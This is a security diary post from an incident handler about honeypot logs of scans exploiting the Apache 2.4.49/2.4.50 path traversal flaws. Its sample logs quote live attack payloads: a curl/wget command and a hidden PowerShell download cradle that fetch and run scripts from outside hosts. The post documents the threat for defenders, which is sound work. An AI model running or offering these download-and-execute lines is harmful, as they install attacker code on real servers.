Johannes published a diary on this activity last week for an Apache 2.4.49 directory traversal vulnerability where the patch was made available on September 15, 2021. Apache released a new update on October 7, 2021, indicating their advisory for "Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)". The current patched version is 2.4.51. My honeypot has since captured various types of scans looking for the presence of Apache. Sample Logs 20211012-225407: 192.168.25.9:80-202.28.250.122:51783 data (curl -k -H Host:heuristic-hermann-392016.netlify.app -fsSL https://52.220.244.242/stg_ntf.sh||wget --no-check-certificate --header=Host:heuristic-hermann-392016.netlify.app -q -O- https://52.220.244.242/stg_ntf.sh)|sh' 20211006-034517: 192.168.25.9:443-46.101.59.235:44008 data 20211013-152703: 192.168.25.9:80-202.28.250.122:42323 data powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'https://heuristic-hermann-392016.netlify.app/stg_ntf.c3.ps1\'))"' 20211016-142000: 192.168.25.9:443-45.146.164.110:48238 data A=|echo;echo -n GTtHWsFXPn|md5sum' Indicators heuristic-hermann-392016.netlify.app The current fix to this issue is to update to Apache 2.4.51. [1] https://isc.sans.edu/forums/diary/Apache+2449+Directory+Traversal+Vulnerability+CVE202141773/27908/ ----------- |
Guy 522 Posts ISC Handler Oct 16th 2021 |
Thread locked Subscribe |
Oct 16th 2021 7 months ago |
Sign Up for Free or Log In to start participating in the conversation!